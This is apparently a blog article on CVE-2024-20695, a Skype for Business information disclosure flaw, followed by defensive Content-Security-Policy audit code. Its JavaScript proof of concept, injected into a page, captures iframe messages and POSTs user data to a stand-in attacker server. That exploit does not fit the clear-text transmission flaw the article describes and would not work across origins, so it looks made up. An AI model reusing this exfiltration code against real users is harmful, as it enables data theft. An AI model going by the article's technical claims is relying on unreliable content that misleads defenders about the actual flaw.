With the rise of remote work and virtual meetings, platforms like Skype for Business have become essential to daily operations for many companies, so the security of these platforms is of paramount importance. This article covers the recently discovered vulnerability CVE-2024-20695, which impacts Skype for Business and potentially exposes sensitive user information. We'll walk through the details of the exploit, show a code snippet, and list resources to help you better understand and mitigate this vulnerability.

Vulnerability Details: CVE-2024-20695

CVE-2024-20695 refers to an "Information Disclosure Vulnerability" found within the Skype for Business application. This vulnerability allows an attacker to gain unauthorized access to sensitive user information, apparently through a clear-text data transmission process. The attack can potentially retrieve user log-in credentials, meeting content, recorded sessions, or presentations shared between different users on the platform.

Original References

* Official CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20695
* National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-20695
* Security Advisory by Vendor: https://portal.msrc.microsoft.com/en-US/security-guidance/releasenotedetail/2024-Jun

Exploit Details

The vulnerability lies in a portion of the Skype for Business application where data is transmitted in clear-text format. Sensitive information is transferred without encryption, which gives an attacker an opportunity to intercept and read that data. A simple proof-of-concept JavaScript code snippet demonstrating this exploit is provided below:

// CVE-2024-20695 Exploit: Skype for Business Information Disclosure Vulnerability

// Requirements: Attacker must be on the same network as the target user.
// Inject the following JavaScript code into a webpage viewed by the target user.

(function() {
  "use strict";
  // Locate and target the Skype iframe
  var skypeIframe = document.querySelector("iframe[src*='lync.com']");
  if(skypeIframe === null) {
    console.error("CVE-2024-20695: No Skype iframe detected.");
    return;
  }

  // Add event listener to catch sensitive information
  skypeIframe.contentWindow.addEventListener("message", function(event) {
    if(event.origin !== "https://lync.com") {
      return;
    }

    // Extract sensitive user information
    var extractedData = JSON.parse(event.data);
    console.log("CVE-2024-20695: Successfully extracted user data:", extractedData);

    // Send the extracted data to attacker's server
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://attacker-server.example.com/collection.php", true);
    xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
    xhr.send(JSON.stringify(extractedData));
  });
})();

Mitigation and Recommendations

Microsoft, the developer and maintainer of Skype for Business, has released a patch to address this vulnerability. It is crucial to update your Skype for Business application to the latest version to prevent potential information disclosure. Other recommendations for mitigating this vulnerability include:

* Always verify the source and authenticity of any software updates before installation.
* Encourage employees or team members to connect to secure networks (e.g., enterprise VPN) when using Skype for Business to reduce the risks of data interception.
* Implement or strengthen policies on acceptable use of company-sponsored communication tools such as Skype for Business.
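
The proof-of-concept snippet in Exploit Details only works if the embedding page lets injected script run and lets that script POST to a third-party origin; a Content-Security-Policy can deny both. The following is an added example, not code from the original article or from the vendor, that audits a CSP header for those two conditions. The sample policies, the `intranet.example` origin and the function names are constructed for illustration, and source matching is simplified to scheme and host.

```javascript
// Parse a CSP header value into { directive: [sources] }; first occurrence wins.
function parseCsp(header) {
  const policy = Object.create(null);
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in policy)) policy[key] = sources;
  }
  return policy;
}

// Simplified match: scheme + host only (ports/paths ignored; scheme-less host = any scheme).
function sourceAllows(source, target, pageOrigin) {
  if (source === "*") return true;
  if (source === "'self'") return target.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return source.toLowerCase() === target.protocol;
  const m = /^(?:(https?):\/\/)?(\*\.)?([a-z0-9.-]+)$/i.exec(source);
  if (!m) return false; // 'none', nonces, hashes and keywords match no URL
  const [, scheme, wildcard, host] = m;
  if (scheme && scheme.toLowerCase() + ":" !== target.protocol) return false;
  const h = host.toLowerCase();
  return wildcard ? target.hostname.endsWith("." + h) : target.hostname === h;
}

// connect-src governs XHR/fetch and falls back to default-src.
function blocksConnect(policy, url, pageOrigin) {
  const sources = policy["connect-src"] || policy["default-src"];
  if (!sources) return false; // no applicable directive: unrestricted
  const target = new URL(url);
  return !sources.some((s) => sourceAllows(s, target, pageOrigin));
}

// script-src governs inline script and falls back to default-src.
function blocksInlineScript(policy) {
  const sources = policy["script-src"] || policy["default-src"];
  if (!sources) return false;
  // Browsers ignore 'unsafe-inline' once a nonce or hash source is present.
  const pinned = sources.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  return pinned || !sources.includes("'unsafe-inline'");
}

// Audit a policy against the collection URL used in the snippet above.
function audit(header, pageOrigin) {
  const exfil = "https://attacker-server.example.com/collection.php";
  const p = parseCsp(header);
  return { exfilBlocked: blocksConnect(p, exfil, pageOrigin), inlineBlocked: blocksInlineScript(p) };
}
const WEAK = "default-src *; script-src 'self' 'unsafe-inline'"; // constructed
const STRICT = "default-src 'self'; script-src 'self'; frame-src https://*.lync.com"; // constructed
console.log(audit(WEAK, "https://intranet.example"), audit(STRICT, "https://intranet.example"));
```

A policy that reports `false` for either field leaves the corresponding step of the snippet unblocked on that page.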

In Conclusion

CVE-2024-20695 is a critical information disclosure vulnerability in Skype for Business that can jeopardize sensitive user data. Prompt action in updating the application and taking preventive measures can help protect your organization's valuable information and maintain the integrity of your communication systems.

Timeline

Published on: 02/13/2024 18:15:48 UTC
Last modified on: 02/26/2024 22:06:41 UTC